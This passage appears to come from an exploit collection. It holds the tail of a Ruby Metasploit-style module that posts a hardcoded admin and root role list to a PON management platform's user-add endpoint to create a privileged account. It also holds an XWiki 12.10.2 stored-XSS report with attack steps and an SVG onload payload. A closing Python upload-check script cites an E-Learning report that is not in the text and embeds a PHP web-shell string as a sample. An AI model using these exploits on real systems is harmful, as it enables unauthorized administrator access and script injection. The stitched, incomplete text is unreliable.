      json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", 
"/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", 
"/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", 
"/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": 
["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": 
["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' res = send_request_raw({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), 
        'cookie' => cookie,
        'data'   => json_data
      })

      if res.code == 200 and res.body.include? '"SUCCESS"'
        print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
        print_good("Username : #{datastore["USERNAME"]}")
        print_good("Password : #{datastore["PASSWORD"]}")
        break
      end
    end
  end
end
-
Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
# Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
# Date: 17-01-2021
# Exploit Author: Karan Keswani
# Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: Xwiki CMS 12.10.2
# Tested on: Windows 10
# Description: XWiki 12.10.2 allows XSS via an SVG document uploaded through the attachment feature of the comment section.
# Additional Information: Well, I found this vulnerability on websites based on the Xwiki project, but they did not respond, so I installed the latest version of Xwiki CMS, hosted it on localhost with the help of Wamp, and then exploited the vulnerability there.

# Attack Vector:
1) Create 2 accounts: 1) Victim & 2) Attacker
2) Log in with the victim account. There is an option to create a new dashboard, and the page asks for a title and a type (type of dashboard: I created a simple page).
3) Now save and view the page.
4) Now log in with the attacker account, then search for and open the dashboard created by the victim.
5) When you open the dashboard there is a comment section. Go to the comment section and add a comment; it has an upload function.
6) So I tried to upload a sample svg file to check that the .svg format is allowed.
7) Then I created a text file with the XSS payload and saved it with a .svg extension.
8) Upload the .svg file, click "Send it to the server" and click OK (the comment will be added).
9) Now open that comment with the victim account and click on "view image": the XSS pop-up appears.

XSS Payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="alert('xss')" xmlns="http://www.w3.org/2000/svg">
</svg>
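Both the E-Learning System report above (a PHP file accepted by the lesson upload endpoint) and this XWiki report (an SVG with an onload handler accepted as a comment attachment) come down to an upload path that trusts the file name. The gate below is an added example, not code from either project: it allow-lists extensions, checks the content against the extension, and for SVG parses the document and rejects anything that can execute script. The sample files and the helper names are constructed.

```python
"""Upload gate for the two reports above. Added example, not code from
E-Learning System or XWiki; the extension list and samples are constructed."""
import os
import xml.etree.ElementTree as ET   # use defusedxml in production to block entity expansion attacks

# Allowed extensions and the magic bytes their content must start with.
# SVG has no magic prefix, so it gets a structural check instead.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
    ".svg": None,
}
SVG_NS = "{http://www.w3.org/2000/svg}"


def _svg_is_inert(data: bytes) -> bool:
    """True only for well-formed SVG with no <script>, no <foreignObject>,
    no on* event-handler attribute and no javascript: reference."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    if root.tag != SVG_NS + "svg":
        return False
    for el in root.iter():
        local = el.tag.split("}")[-1].lower() if isinstance(el.tag, str) else ""
        if local in ("script", "foreignobject"):
            return False
        for attr, val in el.attrib.items():
            name = attr.split("}")[-1].lower()
            if name.startswith("on") or val.strip().lower().startswith("javascript:"):
                return False
    return True


def check_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). The file name is never trusted on its own:
    the extension must be allow-listed and the bytes must match it."""
    base = os.path.basename(filename)
    # No path components and exactly one dot: rejects shell.php.png style names.
    if base != filename or base.count(".") != 1 or base.startswith("."):
        return False, "unexpected file name"
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension %s not allowed" % ext
    magic = ALLOWED[ext]
    if magic is not None:
        if data.startswith(magic):
            return True, "ok"
        return False, "content does not match %s" % ext
    if _svg_is_inert(data):
        return True, "ok"
    return False, "active content in svg"


if __name__ == "__main__":
    # The SVG payload from the report above and the web shell from the E-Learning report.
    svg_xss = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?> '
               b'<svg onload="alert(\'xss\')" xmlns="http://www.w3.org/2000/svg"> </svg>')
    print(check_upload("xss.svg", svg_xss))
    print(check_upload("shell.php", b'<?php echo shell_exec($_REQUEST["cmd"]); ?>'))
```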